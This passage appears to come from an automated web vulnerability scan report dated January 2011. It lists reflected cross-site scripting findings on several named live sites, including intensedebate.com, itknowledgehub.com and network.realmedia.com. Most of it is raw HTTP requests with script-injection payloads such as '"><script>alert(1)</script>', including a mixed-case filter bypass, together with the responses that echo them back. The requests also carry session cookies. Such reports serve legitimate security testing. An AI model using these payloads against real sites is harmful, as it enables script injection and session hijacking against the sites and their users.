<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getUserMenu.php/31bfc'><script>alert(1)</script>3a235cf8e91'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9a80'><script>alert(1)</script>d035da00fb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /logmeind9a80'><script>alert(1)</script>d035da00fb9 HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://intensedebate.com/empty.phpd43c7'%3E%3Cscript%3Ealert(1)%3C/script%3Eb83048b6d9a Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __utmb=239309019.1.10.1296494785; __qca=P0-1269071080-1296494784940
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 20:54:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/logmeind9a80'><script>alert(1)</script>d035da00fb9'> ...[SNIP]...
1.38. http://intensedebate.com/logmein [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intensedebate.com
Path:
/logmein
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1ad4'><script>alert(1)</script>8d1e3f38acf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /logmein?a1ad4'><script>alert(1)</script>8d1e3f38acf=1 HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://intensedebate.com/empty.phpd43c7'%3E%3Cscript%3Ealert(1)%3C/script%3Eb83048b6d9a Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __utmb=239309019.1.10.1296494785; __qca=P0-1269071080-1296494784940
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 20:54:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 7938
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/logmein?a1ad4'><script>alert(1)</script>8d1e3f38acf=1'> ...[SNIP]...
1.39. http://itknowledgehub.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://itknowledgehub.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db65"><script>alert(1)</script>956356ca0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db65\"><script>alert(1)</script>956356ca0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?4db65"><script>alert(1)</script>956356ca0d=1 HTTP/1.1 Host: itknowledgehub.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:25:46 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 X-Pingback: http://itknowledgehub.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 128082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 381c7<script>alert(1)</script>05017fb37be was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD381c7<script>alert(1)</script>05017fb37be&tr=ECT_NEWS_ARTICLES&num=1&layt=630x90&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 17:11:25 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 31 Jan 2011 17:11:25 GMT Content-Type: application/x-javascript Content-Length: 95
// Error: Unknown old section ECT_NEWS_TECH_NEWS_WORLD381c7<script>alert(1)</script>05017fb37be
1.41. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e58ef<script>alert(1)</script>33a03b418b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD&tr=ECT_NEWS_ARTICLES&num=1&layt=630x90&fmt=simp&e58ef<script>alert(1)</script>33a03b418b2=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 17:11:27 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 31 Jan 2011 17:11:27 GMT Content-Type: application/x-javascript Content-Length: 69
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 39215<script>alert(1)</script>040828dfd29 was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD&tr=ECT_NEWS_ARTICLES39215<script>alert(1)</script>040828dfd29&num=1&layt=630x90&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 17:11:26 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 31 Jan 2011 17:11:26 GMT Content-Type: application/x-javascript Content-Length: 92
// Error: Site 890 has no section ECT_NEWS_ARTICLES39215<script>alert(1)</script>040828dfd29
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23b8f"><script>alert(1)</script>8ab429ee252 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews23b8f"><script>alert(1)</script>8ab429ee252/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:00 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 372 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7571"><ScRiPt>alert(1)</ScRiPt>aba5c424809 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/d7571"><ScRiPt>alert(1)</ScRiPt>aba5c424809/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:51:01 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011Pk0iDO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1408 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 20:52:01 GMT;path=/
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3acec"%3b659808a9e9b was submitted in the REST URL parameter 5. This input was echoed as 3acec";659808a9e9b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork3acec"%3b659808a9e9b/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:03 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIJO2016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 875 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:03 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9b0"><script>alert(1)</script>0c74033a4fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork8b9b0"><script>alert(1)</script>0c74033a4fe/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:02 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIIO2016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 925 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88700"%3b3040819f01d was submitted in the REST URL parameter 6. This input was echoed as 88700";3040819f01d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x60088700"%3b3040819f01d/autnwsrlsttch/ss/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:09 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIPO1016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 875 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb6b"><script>alert(1)</script>15c7e547e2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x6008fb6b"><script>alert(1)</script>15c7e547e2/autnwsrlsttch/ss/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:08 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIOO1016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2015 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:08 GMT;path=/
<script type="text/javascript"> function pr_swfver(){ var osf,osfd,i,axo=1,v=0,nv=navigator; if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf. ...[SNIP]... <script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork/160x6008fb6b"><script>alert(1)</script>15c7e547e2/autnwsrlsttch/ss/a/L7&mm_flag="> ...[SNIP]...
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e053e"%3be398090d692 was submitted in the REST URL parameter 7. This input was echoed as e053e";e398090d692 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/e053e"%3be398090d692/ss/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:20 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIaO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 849 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:20 GMT;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4bb6"><script>alert(1)</script>d1d8b8f699e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttcha4bb6"><script>alert(1)</script>d1d8b8f699e/ss/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
